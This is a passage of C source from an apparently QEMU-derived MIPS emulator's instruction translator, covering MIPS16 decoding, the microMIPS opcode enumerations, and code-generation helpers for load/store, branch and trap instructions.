check_mips_64(ctx); tcg_gen_ext32u_tl(tcg_ctx, tcg_ctx->cpu_gpr[rx], tcg_ctx->cpu_gpr[rx]); break; case RR_RY_CNVT_SEW: check_insn(ctx, ISA_MIPS64); check_mips_64(ctx); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rx], tcg_ctx->cpu_gpr[rx]); break; #endif default: generate_exception_end(ctx, EXCP_RI); break; } break; case RR_MFLO: gen_HILO(ctx, OPC_MFLO, 0, rx); break; #if defined(TARGET_MIPS64) case RR_DSRA: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift_imm(ctx, OPC_DSRA, ry, ry, sa); break; case RR_DSLLV: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift(ctx, OPC_DSLLV, ry, rx, ry); break; case RR_DSRLV: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift(ctx, OPC_DSRLV, ry, rx, ry); break; case RR_DSRAV: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_shift(ctx, OPC_DSRAV, ry, rx, ry); break; #endif case RR_MULT: gen_muldiv(ctx, OPC_MULT, 0, rx, ry); break; case RR_MULTU: gen_muldiv(ctx, OPC_MULTU, 0, rx, ry); break; case RR_DIV: gen_muldiv(ctx, OPC_DIV, 0, rx, ry); break; case RR_DIVU: gen_muldiv(ctx, OPC_DIVU, 0, rx, ry); break; #if defined(TARGET_MIPS64) case RR_DMULT: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_muldiv(ctx, OPC_DMULT, 0, rx, ry); break; case RR_DMULTU: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_muldiv(ctx, OPC_DMULTU, 0, rx, ry); break; case RR_DDIV: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_muldiv(ctx, OPC_DDIV, 0, rx, ry); break; case RR_DDIVU: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_muldiv(ctx, OPC_DDIVU, 0, rx, ry); break; #endif default: generate_exception_end(ctx, EXCP_RI); break; } break; case M16_OPC_EXTEND: decode_extended_mips16_opc(env, ctx); n_bytes = 4; break; #if defined(TARGET_MIPS64) case M16_OPC_I64: funct = (ctx->opcode >> 8) & 0x7; decode_i64_mips16(ctx, ry, funct, offset, 0); break; #endif default: generate_exception_end(ctx, EXCP_RI); break; } return n_bytes; } /* microMIPS extension to MIPS32/MIPS64 */ /* * microMIPS32/microMIPS64 major opcodes * * 1. MIPS Architecture for Programmers Volume II-B: * The microMIPS32 Instruction Set (Revision 3.05) * * Table 6.2 microMIPS32 Encoding of Major Opcode Field * * 2. MIPS Architecture For Programmers Volume II-A: * The MIPS64 Instruction Set (Revision 3.51) */ enum { POOL32A = 0x00, POOL16A = 0x01, LBU16 = 0x02, MOVE16 = 0x03, ADDI32 = 0x04, R6_LUI = 0x04, AUI = 0x04, LBU32 = 0x05, SB32 = 0x06, LB32 = 0x07, POOL32B = 0x08, POOL16B = 0x09, LHU16 = 0x0a, ANDI16 = 0x0b, ADDIU32 = 0x0c, LHU32 = 0x0d, SH32 = 0x0e, LH32 = 0x0f, POOL32I = 0x10, POOL16C = 0x11, LWSP16 = 0x12, POOL16D = 0x13, ORI32 = 0x14, POOL32F = 0x15, POOL32S = 0x16, /* MIPS64 */ DADDIU32 = 0x17, /* MIPS64 */ POOL32C = 0x18, LWGP16 = 0x19, LW16 = 0x1a, POOL16E = 0x1b, XORI32 = 0x1c, JALS32 = 0x1d, BOVC = 0x1d, BEQC = 0x1d, BEQZALC = 0x1d, ADDIUPC = 0x1e, PCREL = 0x1e, BNVC = 0x1f, BNEC = 0x1f, BNEZALC = 0x1f, R6_BEQZC = 0x20, JIC = 0x20, POOL16F = 0x21, SB16 = 0x22, BEQZ16 = 0x23, BEQZC16 = 0x23, SLTI32 = 0x24, BEQ32 = 0x25, BC = 0x25, SWC132 = 0x26, LWC132 = 0x27, /* 0x29 is reserved */ RES_29 = 0x29, R6_BNEZC = 0x28, JIALC = 0x28, SH16 = 0x2a, BNEZ16 = 0x2b, BNEZC16 = 0x2b, SLTIU32 = 0x2c, BNE32 = 0x2d, BALC = 0x2d, SDC132 = 0x2e, LDC132 = 0x2f, /* 0x31 is reserved */ RES_31 = 0x31, BLEZALC = 0x30, BGEZALC = 0x30, BGEUC = 0x30, SWSP16 = 0x32, B16 = 0x33, BC16 = 0x33, ANDI32 = 0x34, J32 = 0x35, BGTZC = 0x35, BLTZC = 0x35, BLTC = 0x35, SD32 = 0x36, /* MIPS64 */ LD32 = 0x37, /* MIPS64 */ /* 0x39 is reserved */ RES_39 = 0x39, BGTZALC = 0x38, BLTZALC = 0x38, BLTUC = 0x38, SW16 = 0x3a, LI16 = 0x3b, JALX32 = 0x3c, JAL32 = 0x3d, BLEZC = 0x3d, BGEZC = 0x3d, BGEC = 0x3d, SW32 = 0x3e, LW32 = 0x3f }; /* PCREL Instructions perform PC-Relative address calculation. bits 20..16 */ enum { ADDIUPC_00 = 0x00, ADDIUPC_01 = 0x01, ADDIUPC_02 = 0x02, ADDIUPC_03 = 0x03, ADDIUPC_04 = 0x04, ADDIUPC_05 = 0x05, ADDIUPC_06 = 0x06, ADDIUPC_07 = 0x07, AUIPC = 0x1e, ALUIPC = 0x1f, LWPC_08 = 0x08, LWPC_09 = 0x09, LWPC_0A = 0x0A, LWPC_0B = 0x0B, LWPC_0C = 0x0C, LWPC_0D = 0x0D, LWPC_0E = 0x0E, LWPC_0F = 0x0F, }; /* POOL32A encoding of minor opcode field */ enum { /* * These opcodes are distinguished only by bits 9..6; those bits are * what are recorded below. */ SLL32 = 0x0, SRL32 = 0x1, SRA = 0x2, ROTR = 0x3, SELEQZ = 0x5, SELNEZ = 0x6, R6_RDHWR = 0x7, SLLV = 0x0, SRLV = 0x1, SRAV = 0x2, ROTRV = 0x3, ADD = 0x4, ADDU32 = 0x5, SUB = 0x6, SUBU32 = 0x7, MUL = 0x8, AND = 0x9, OR32 = 0xa, NOR = 0xb, XOR32 = 0xc, SLT = 0xd, SLTU = 0xe, MOVN = 0x0, R6_MUL = 0x0, MOVZ = 0x1, MUH = 0x1, MULU = 0x2, MUHU = 0x3, LWXS = 0x4, R6_DIV = 0x4, MOD = 0x5, R6_DIVU = 0x6, MODU = 0x7, /* The following can be distinguished by their lower 6 bits. */ BREAK32 = 0x07, INS = 0x0c, LSA = 0x0f, ALIGN = 0x1f, EXT = 0x2c, POOL32AXF = 0x3c, SIGRIE = 0x3f }; /* POOL32AXF encoding of minor opcode field extension */ /* * 1. MIPS Architecture for Programmers Volume II-B: * The microMIPS32 Instruction Set (Revision 3.05) * * Table 6.5 POOL32Axf Encoding of Minor Opcode Extension Field * * 2. MIPS Architecture for Programmers VolumeIV-e: * The MIPS DSP Application-Specific Extension * to the microMIPS32 Architecture (Revision 2.34) * * Table 5.5 POOL32Axf Encoding of Minor Opcode Extension Field */ enum { /* bits 11..6 */ TEQ = 0x00, TGE = 0x08, TGEU = 0x10, TLT = 0x20, TLTU = 0x28, TNE = 0x30, MFC0 = 0x03, MTC0 = 0x0b, /* begin of microMIPS32 DSP */ /* bits 13..12 for 0x01 */ MFHI_ACC = 0x0, MFLO_ACC = 0x1, MTHI_ACC = 0x2, MTLO_ACC = 0x3, /* bits 13..12 for 0x2a */ MADD_ACC = 0x0, MADDU_ACC = 0x1, MSUB_ACC = 0x2, MSUBU_ACC = 0x3, /* bits 13..12 for 0x32 */ MULT_ACC = 0x0, MULTU_ACC = 0x1, /* end of microMIPS32 DSP */ /* bits 15..12 for 0x2c */ BITSWAP = 0x0, SEB = 0x2, SEH = 0x3, CLO = 0x4, CLZ = 0x5, RDHWR = 0x6, WSBH = 0x7, MULT = 0x8, MULTU = 0x9, DIV = 0xa, DIVU = 0xb, MADD = 0xc, MADDU = 0xd, MSUB = 0xe, MSUBU = 0xf, /* bits 15..12 for 0x34 */ MFC2 = 0x4, MTC2 = 0x5, MFHC2 = 0x8, MTHC2 = 0x9, CFC2 = 0xc, CTC2 = 0xd, /* bits 15..12 for 0x3c */ JALR = 0x0, JR = 0x0, /* alias */ JALRC = 0x0, JRC = 0x0, JALR_HB = 0x1, JALRC_HB = 0x1, JALRS = 0x4, JALRS_HB = 0x5, /* bits 15..12 for 0x05 */ RDPGPR = 0xe, WRPGPR = 0xf, /* bits 15..12 for 0x0d */ TLBP = 0x0, TLBR = 0x1, TLBWI = 0x2, TLBWR = 0x3, TLBINV = 0x4, TLBINVF = 0x5, WAIT = 0x9, IRET = 0xd, DERET = 0xe, ERET = 0xf, /* bits 15..12 for 0x15 */ DMT = 0x0, DVPE = 0x1, EMT = 0x2, EVPE = 0x3, /* bits 15..12 for 0x1d */ DI = 0x4, EI = 0x5, /* bits 15..12 for 0x2d */ SYNC = 0x6, SYSCALL = 0x8, SDBBP = 0xd, /* bits 15..12 for 0x35 */ MFHI32 = 0x0, MFLO32 = 0x1, MTHI32 = 0x2, MTLO32 = 0x3, }; /* POOL32B encoding of minor opcode field (bits 15..12) */ enum { LWC2 = 0x0, LWP = 0x1, LDP = 0x4, LWM32 = 0x5, CACHE = 0x6, LDM = 0x7, SWC2 = 0x8, SWP = 0x9, SDP = 0xc, SWM32 = 0xd, SDM = 0xf }; /* POOL32C encoding of minor opcode field (bits 15..12) */ enum { LWL = 0x0, SWL = 0x8, LWR = 0x1, SWR = 0x9, PREF = 0x2, ST_EVA = 0xa, LL = 0x3, SC = 0xb, LDL = 0x4, SDL = 0xc, LDR = 0x5, SDR = 0xd, LD_EVA = 0x6, LWU = 0xe, LLD = 0x7, SCD = 0xf }; /* POOL32C LD-EVA encoding of minor opcode field (bits 11..9) */ enum { LBUE = 0x0, LHUE = 0x1, LWLE = 0x2, LWRE = 0x3, LBE = 0x4, LHE = 0x5, LLE = 0x6, LWE = 0x7, }; /* POOL32C ST-EVA encoding of minor opcode field (bits 11..9) */ enum { SWLE = 0x0, SWRE = 0x1, PREFE = 0x2, CACHEE = 0x3, SBE = 0x4, SHE = 0x5, SCE = 0x6, SWE = 0x7, }; /* POOL32F encoding of minor opcode field (bits 5..0) */ enum { /* These are the bit 7..6 values */ ADD_FMT = 0x0, SUB_FMT = 0x1, MUL_FMT = 0x2, DIV_FMT = 0x3, /* These are the bit 8..6 values */ MOVN_FMT = 0x0, RSQRT2_FMT = 0x0, MOVF_FMT = 0x0, RINT_FMT = 0x0, SELNEZ_FMT = 0x0, MOVZ_FMT = 0x1, LWXC1 = 0x1, MOVT_FMT = 0x1, CLASS_FMT = 0x1, SELEQZ_FMT = 0x1, PLL_PS = 0x2, SWXC1 = 0x2, SEL_FMT = 0x2, PLU_PS = 0x3, LDXC1 = 0x3, MOVN_FMT_04 = 0x4, PUL_PS = 0x4, SDXC1 = 0x4, RECIP2_FMT = 0x4, MOVZ_FMT_05 = 0x05, PUU_PS = 0x5, LUXC1 = 0x5, CVT_PS_S = 0x6, SUXC1 = 0x6, ADDR_PS = 0x6, PREFX = 0x6, MADDF_FMT = 0x6, MULR_PS = 0x7, MSUBF_FMT = 0x7, MADD_S = 0x01, MADD_D = 0x09, MADD_PS = 0x11, ALNV_PS = 0x19, MSUB_S = 0x21, MSUB_D = 0x29, MSUB_PS = 0x31, NMADD_S = 0x02, NMADD_D = 0x0a, NMADD_PS = 0x12, NMSUB_S = 0x22, NMSUB_D = 0x2a, NMSUB_PS = 0x32, MIN_FMT = 0x3, MAX_FMT = 0xb, MINA_FMT = 0x23, MAXA_FMT = 0x2b, POOL32FXF = 0x3b, CABS_COND_FMT = 0x1c, /* MIPS3D */ C_COND_FMT = 0x3c, CMP_CONDN_S = 0x5, CMP_CONDN_D = 0x15 }; /* POOL32Fxf encoding of minor opcode extension field */ enum { CVT_L = 0x04, RSQRT_FMT = 0x08, FLOOR_L = 0x0c, CVT_PW_PS = 0x1c, CVT_W = 0x24, SQRT_FMT = 0x28, FLOOR_W = 0x2c, CVT_PS_PW = 0x3c, CFC1 = 0x40, RECIP_FMT = 0x48, CEIL_L = 0x4c, CTC1 = 0x60, CEIL_W = 0x6c, MFC1 = 0x80, CVT_S_PL = 0x84, TRUNC_L = 0x8c, MTC1 = 0xa0, CVT_S_PU = 0xa4, TRUNC_W = 0xac, MFHC1 = 0xc0, ROUND_L = 0xcc, MTHC1 = 0xe0, ROUND_W = 0xec, MOV_FMT = 0x01, MOVF = 0x05, ABS_FMT = 0x0d, RSQRT1_FMT = 0x1d, MOVT = 0x25, NEG_FMT = 0x2d, CVT_D = 0x4d, RECIP1_FMT = 0x5d, CVT_S = 0x6d }; /* POOL32I encoding of minor opcode field (bits 25..21) */ enum { BLTZ = 0x00, BLTZAL = 0x01, BGEZ = 0x02, BGEZAL = 0x03, BLEZ = 0x04, BNEZC = 0x05, BGTZ = 0x06, BEQZC = 0x07, TLTI = 0x08, BC1EQZC = 0x08, TGEI = 0x09, BC1NEZC = 0x09, TLTIU = 0x0a, BC2EQZC = 0x0a, TGEIU = 0x0b, BC2NEZC = 0x0a, TNEI = 0x0c, R6_SYNCI = 0x0c, LUI = 0x0d, TEQI = 0x0e, SYNCI = 0x10, BLTZALS = 0x11, BGEZALS = 0x13, BC2F = 0x14, BC2T = 0x15, BPOSGE64 = 0x1a, BPOSGE32 = 0x1b, /* These overlap and are distinguished by bit16 of the instruction */ BC1F = 0x1c, BC1T = 0x1d, BC1ANY2F = 0x1c, BC1ANY2T = 0x1d, BC1ANY4F = 0x1e, BC1ANY4T = 0x1f }; /* POOL16A encoding of minor opcode field */ enum { ADDU16 = 0x0, SUBU16 = 0x1 }; /* POOL16B encoding of minor opcode field */ enum { SLL16 = 0x0, SRL16 = 0x1 }; /* POOL16C encoding of minor opcode field */ enum { NOT16 = 0x00, XOR16 = 0x04, AND16 = 0x08, OR16 = 0x0c, LWM16 = 0x10, SWM16 = 0x14, JR16 = 0x18, JRC16 = 0x1a, JALR16 = 0x1c, JALR16S = 0x1e, MFHI16 = 0x20, MFLO16 = 0x24, BREAK16 = 0x28, SDBBP16 = 0x2c, JRADDIUSP = 0x30 }; /* R6 POOL16C encoding of minor opcode field (bits 0..5) */ enum { R6_NOT16 = 0x00, R6_AND16 = 0x01, R6_LWM16 = 0x02, R6_JRC16 = 0x03, MOVEP = 0x04, MOVEP_05 = 0x05, MOVEP_06 = 0x06, MOVEP_07 = 0x07, R6_XOR16 = 0x08, R6_OR16 = 0x09, R6_SWM16 = 0x0a, JALRC16 = 0x0b, MOVEP_0C = 0x0c, MOVEP_0D = 0x0d, MOVEP_0E = 0x0e, MOVEP_0F = 0x0f, JRCADDIUSP = 0x13, R6_BREAK16 = 0x1b, R6_SDBBP16 = 0x3b }; /* POOL16D encoding of minor opcode field */ enum { ADDIUS5 = 0x0, ADDIUSP = 0x1 }; /* POOL16E encoding of minor opcode field */ enum { ADDIUR2 = 0x0, ADDIUR1SP = 0x1 }; static int mmreg(int r) { static const int map[] = { 16, 17, 2, 3, 4, 5, 6, 7 }; return map[r]; } /* Used for 16-bit store instructions. */ static int mmreg2(int r) { static const int map[] = { 0, 17, 2, 3, 4, 5, 6, 7 }; return map[r]; } #define uMIPS_RD(op) ((op >> 7) & 0x7) #define uMIPS_RS(op) ((op >> 4) & 0x7) #define uMIPS_RS2(op) uMIPS_RS(op) #define uMIPS_RS1(op) ((op >> 1) & 0x7) #define uMIPS_RD5(op) ((op >> 5) & 0x1f) #define uMIPS_RS5(op) (op & 0x1f) /* Signed immediate */ #define SIMM(op, start, width) \ ((int32_t)(((op >> start) & ((~0U) >> (32 - width))) \ << (32 - width)) \ >> (32 - width)) /* Zero-extended immediate */ #define ZIMM(op, start, width) ((op >> start) & ((~0U) >> (32 - width))) static void gen_addiur1sp(DisasContext *ctx) { int rd = mmreg(uMIPS_RD(ctx->opcode)); gen_arith_imm(ctx, OPC_ADDIU, rd, 29, ((ctx->opcode >> 1) & 0x3f) << 2); } static void gen_addiur2(DisasContext *ctx) { static const int decoded_imm[] = { 1, 4, 8, 12, 16, 20, 24, -1 }; int rd = mmreg(uMIPS_RD(ctx->opcode)); int rs = mmreg(uMIPS_RS(ctx->opcode)); gen_arith_imm(ctx, OPC_ADDIU, rd, rs, decoded_imm[ZIMM(ctx->opcode, 1, 3)]); } static void gen_addiusp(DisasContext *ctx) { int encoded = ZIMM(ctx->opcode, 1, 9); int decoded; if (encoded <= 1) { decoded = 256 + encoded; } else if (encoded <= 255) { decoded = encoded; } else if (encoded <= 509) { decoded = encoded - 512; } else { decoded = encoded - 768; } gen_arith_imm(ctx, OPC_ADDIU, 29, 29, decoded << 2); } static void gen_addius5(DisasContext *ctx) { int imm = SIMM(ctx->opcode, 1, 4); int rd = (ctx->opcode >> 5) & 0x1f; gen_arith_imm(ctx, OPC_ADDIU, rd, rd, imm); } static void gen_andi16(DisasContext *ctx) { static const int decoded_imm[] = { 128, 1, 2, 3, 4, 7, 8, 15, 16, 31, 32, 63, 64, 255, 32768, 65535 }; int rd = mmreg(uMIPS_RD(ctx->opcode)); int rs = mmreg(uMIPS_RS(ctx->opcode)); int encoded = ZIMM(ctx->opcode, 0, 4); gen_logic_imm(ctx, OPC_ANDI, rd, rs, decoded_imm[encoded]); } static void gen_ldst_multiple(DisasContext *ctx, uint32_t opc, int reglist, int base, int16_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; TCGv_i32 t2; if (ctx->hflags & MIPS_HFLAG_BMASK) { generate_exception_end(ctx, EXCP_RI); return; } t0 = tcg_temp_new(tcg_ctx); gen_base_offset_addr(ctx, t0, base, offset); t1 = tcg_const_tl(tcg_ctx, reglist); t2 = tcg_const_i32(tcg_ctx, ctx->mem_idx); save_cpu_state(ctx, 1); switch (opc) { case LWM32: gen_helper_lwm(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); break; case SWM32: gen_helper_swm(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); break; #ifdef TARGET_MIPS64 case LDM: gen_helper_ldm(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); break; case SDM: gen_helper_sdm(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); break; #endif } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); } static void gen_pool16c_insn(DisasContext *ctx) { int rd = mmreg((ctx->opcode >> 3) & 0x7); int rs = mmreg(ctx->opcode & 0x7); switch (((ctx->opcode) >> 4) & 0x3f) { case NOT16 + 0: case NOT16 + 1: case NOT16 + 2: case NOT16 + 3: gen_logic(ctx, OPC_NOR, rd, rs, 0); break; case XOR16 + 0: case XOR16 + 1: case XOR16 + 2: case XOR16 + 3: gen_logic(ctx, OPC_XOR, rd, rd, rs); break; case AND16 + 0: case AND16 + 1: case AND16 + 2: case AND16 + 3: gen_logic(ctx, OPC_AND, rd, rd, rs); break; case OR16 + 0: case OR16 + 1: case OR16 + 2: case OR16 + 3: gen_logic(ctx, OPC_OR, rd, rd, rs); break; case LWM16 + 0: case LWM16 + 1: case LWM16 + 2: case LWM16 + 3: { static const int lwm_convert[] = { 0x11, 0x12, 0x13, 0x14 }; int offset = ZIMM(ctx->opcode, 0, 4); gen_ldst_multiple(ctx, LWM32, lwm_convert[(ctx->opcode >> 4) & 0x3], 29, offset << 2); } break; case SWM16 + 0: case SWM16 + 1: case SWM16 + 2: case SWM16 + 3: { static const int swm_convert[] = { 0x11, 0x12, 0x13, 0x14 }; int offset = ZIMM(ctx->opcode, 0, 4); gen_ldst_multiple(ctx, SWM32, swm_convert[(ctx->opcode >> 4) & 0x3], 29, offset << 2); } break; case JR16 + 0: case JR16 + 1: { int reg = ctx->opcode & 0x1f; gen_compute_branch(ctx, OPC_JR, 2, reg, 0, 0, 4); } break; case JRC16 + 0: case JRC16 + 1: { int reg = ctx->opcode & 0x1f; gen_compute_branch(ctx, OPC_JR, 2, reg, 0, 0, 0); /* * Let normal delay slot handling in our caller take us * to the branch target. */ } break; case JALR16 + 0: case JALR16 + 1: gen_compute_branch(ctx, OPC_JALR, 2, ctx->opcode & 0x1f, 31, 0, 4); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; break; case JALR16S + 0: case JALR16S + 1: gen_compute_branch(ctx, OPC_JALR, 2, ctx->opcode & 0x1f, 31, 0, 2); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; break; case MFHI16 + 0: case MFHI16 + 1: gen_HILO(ctx, OPC_MFHI, 0, uMIPS_RS5(ctx->opcode)); break; case MFLO16 + 0: case MFLO16 + 1: gen_HILO(ctx, OPC_MFLO, 0, uMIPS_RS5(ctx->opcode)); break; case BREAK16: generate_exception_end(ctx, EXCP_BREAK); break; case SDBBP16: if (is_uhi(extract32(ctx->opcode, 0, 4))) { // gen_helper_do_semihosting(tcg_ctx, tcg_ctx->cpu_env); } else { /* * XXX: not clear which exception should be raised * when in debug mode... */ check_insn(ctx, ISA_MIPS32); generate_exception_end(ctx, EXCP_DBp); } break; case JRADDIUSP + 0: case JRADDIUSP + 1: { int imm = ZIMM(ctx->opcode, 0, 5); gen_compute_branch(ctx, OPC_JR, 2, 31, 0, 0, 0); gen_arith_imm(ctx, OPC_ADDIU, 29, 29, imm << 2); /* * Let normal delay slot handling in our caller take us * to the branch target. */ } break; default: generate_exception_end(ctx, EXCP_RI); break; } } static inline void gen_movep(DisasContext *ctx, int enc_dest, int enc_rt, int enc_rs) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rd, rs, re, rt; static const int rd_enc[] = { 5, 5, 6, 4, 4, 4, 4, 4 }; static const int re_enc[] = { 6, 7, 7, 21, 22, 5, 6, 7 }; static const int rs_rt_enc[] = { 0, 17, 2, 3, 16, 18, 19, 20 }; rd = rd_enc[enc_dest]; re = re_enc[enc_dest]; rs = rs_rt_enc[enc_rs]; rt = rs_rt_enc[enc_rt]; if (rs) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } if (rt) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[re], tcg_ctx->cpu_gpr[rt]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[re], 0); } } static void gen_pool16c_r6_insn(DisasContext *ctx) { int rt = mmreg((ctx->opcode >> 7) & 0x7); int rs = mmreg((ctx->opcode >> 4) & 0x7); switch (ctx->opcode & 0xf) { case R6_NOT16: gen_logic(ctx, OPC_NOR, rt, rs, 0); break; case R6_AND16: gen_logic(ctx, OPC_AND, rt, rt, rs); break; case R6_LWM16: { int lwm_converted = 0x11 + extract32(ctx->opcode, 8, 2); int offset = extract32(ctx->opcode, 4, 4); gen_ldst_multiple(ctx, LWM32, lwm_converted, 29, offset << 2); } break; case R6_JRC16: /* JRCADDIUSP */ if ((ctx->opcode >> 4) & 1) { /* JRCADDIUSP */ int imm = extract32(ctx->opcode, 5, 5); gen_compute_branch(ctx, OPC_JR, 2, 31, 0, 0, 0); gen_arith_imm(ctx, OPC_ADDIU, 29, 29, imm << 2); } else { /* JRC16 */ rs = extract32(ctx->opcode, 5, 5); gen_compute_branch(ctx, OPC_JR, 2, rs, 0, 0, 0); } break; case MOVEP: case MOVEP_05: case MOVEP_06: case MOVEP_07: case MOVEP_0C: case MOVEP_0D: case MOVEP_0E: case MOVEP_0F: { int enc_dest = uMIPS_RD(ctx->opcode); int enc_rt = uMIPS_RS2(ctx->opcode); int enc_rs = (ctx->opcode & 3) | ((ctx->opcode >> 1) & 4); gen_movep(ctx, enc_dest, enc_rt, enc_rs); } break; case R6_XOR16: gen_logic(ctx, OPC_XOR, rt, rt, rs); break; case R6_OR16: gen_logic(ctx, OPC_OR, rt, rt, rs); break; case R6_SWM16: { int swm_converted = 0x11 + extract32(ctx->opcode, 8, 2); int offset = extract32(ctx->opcode, 4, 4); gen_ldst_multiple(ctx, SWM32, swm_converted, 29, offset << 2); } break; case JALRC16: /* BREAK16, SDBBP16 */ switch (ctx->opcode & 0x3f) { case JALRC16: case JALRC16 + 0x20: /* JALRC16 */ gen_compute_branch(ctx, OPC_JALR, 2, (ctx->opcode >> 5) & 0x1f, 31, 0, 0); break; case R6_BREAK16: /* BREAK16 */ generate_exception(ctx, EXCP_BREAK); break; case R6_SDBBP16: /* SDBBP16 */ if (is_uhi(extract32(ctx->opcode, 6, 4))) { // gen_helper_do_semihosting(tcg_ctx, tcg_ctx->cpu_env); } else { if (ctx->hflags & MIPS_HFLAG_SBRI) { generate_exception(ctx, EXCP_RI); } else { generate_exception(ctx, EXCP_DBp); } } break; } break; default: generate_exception(ctx, EXCP_RI); break; } } static void gen_ldxs(DisasContext *ctx, int base, int index, int rd) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, base); if (index != 0) { gen_load_gpr(tcg_ctx, t1, index); tcg_gen_shli_tl(tcg_ctx, t1, t1, 2); gen_op_addr_add(ctx, t0, t1, t0); } tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TESL); gen_store_gpr(tcg_ctx, t1, rd); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void gen_ldst_pair(DisasContext *ctx, uint32_t opc, int rd, int base, int16_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; if (ctx->hflags & MIPS_HFLAG_BMASK || rd == 31) { generate_exception_end(ctx, EXCP_RI); return; } t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_base_offset_addr(ctx, t0, base, offset); switch (opc) { case LWP: if (rd == base) { generate_exception_end(ctx, EXCP_RI); return; } tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TESL); gen_store_gpr(tcg_ctx, t1, rd); tcg_gen_movi_tl(tcg_ctx, t1, 4); gen_op_addr_add(ctx, t0, t0, t1); tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TESL); gen_store_gpr(tcg_ctx, t1, rd + 1); break; case SWP: gen_load_gpr(tcg_ctx, t1, rd); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUL); tcg_gen_movi_tl(tcg_ctx, t1, 4); gen_op_addr_add(ctx, t0, t0, t1); gen_load_gpr(tcg_ctx, t1, rd + 1); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUL); break; #ifdef TARGET_MIPS64 case LDP: if (rd == base) { generate_exception_end(ctx, EXCP_RI); return; } tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEQ); gen_store_gpr(tcg_ctx, t1, rd); tcg_gen_movi_tl(tcg_ctx, t1, 8); gen_op_addr_add(ctx, t0, t0, t1); tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEQ); gen_store_gpr(tcg_ctx, t1, rd + 1); break; case SDP: gen_load_gpr(tcg_ctx, t1, rd); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEQ); tcg_gen_movi_tl(tcg_ctx, t1, 8); gen_op_addr_add(ctx, t0, t0, t1); gen_load_gpr(tcg_ctx, t1, rd + 1); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEQ); break; #endif } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void gen_sync(TCGContext *tcg_ctx, int stype) { TCGBar tcg_mo = TCG_BAR_SC; switch (stype) { case 0x4: /* SYNC_WMB */ tcg_mo |= TCG_MO_ST_ST; break; case 0x10: /* SYNC_MB */ tcg_mo |= TCG_MO_ALL; break; case 0x11: /* SYNC_ACQUIRE */ tcg_mo |= TCG_MO_LD_LD | TCG_MO_LD_ST; break; case 0x12: /* SYNC_RELEASE */ tcg_mo |= TCG_MO_ST_ST | TCG_MO_LD_ST; break; case 0x13: /* SYNC_RMB */ tcg_mo |= TCG_MO_LD_LD; break; default: tcg_mo |= TCG_MO_ALL; break; } tcg_gen_mb(tcg_ctx, tcg_mo); } static void gen_pool32axf(CPUMIPSState *env, DisasContext *ctx, int rt, int rs) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int extension = (ctx->opcode >> 6) & 0x3f; int minor = (ctx->opcode >> 12) & 0xf; uint32_t mips32_op; switch (extension) { case TEQ: mips32_op = OPC_TEQ; goto do_trap; case TGE: mips32_op = OPC_TGE; goto do_trap; case TGEU: mips32_op = OPC_TGEU; goto do_trap; case TLT: mips32_op = OPC_TLT; goto do_trap; case TLTU: mips32_op = OPC_TLTU; goto do_trap; case TNE: mips32_op = OPC_TNE; do_trap: gen_trap(ctx, mips32_op, rs, rt, -1); break; case MFC0: case MFC0 + 32: check_cp0_enabled(ctx); if (rt == 0) { /* Treat as NOP. */ break; } gen_mfc0(ctx, tcg_ctx->cpu_gpr[rt], rs, (ctx->opcode >> 11) & 0x7); break; case MTC0: case MTC0 + 32: check_cp0_enabled(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_mtc0(ctx, t0, rs, (ctx->opcode >> 11) & 0x7); tcg_temp_free(tcg_ctx, t0); } break; case 0x2a: switch (minor & 3) { case MADD_ACC: gen_muldiv(ctx, OPC_MADD, (ctx->opcode >> 14) & 3, rs, rt); break; case MADDU_ACC: gen_muldiv(ctx, OPC_MADDU, (ctx->opcode >> 14) & 3, rs, rt); break; case MSUB_ACC: gen_muldiv(ctx, OPC_MSUB, 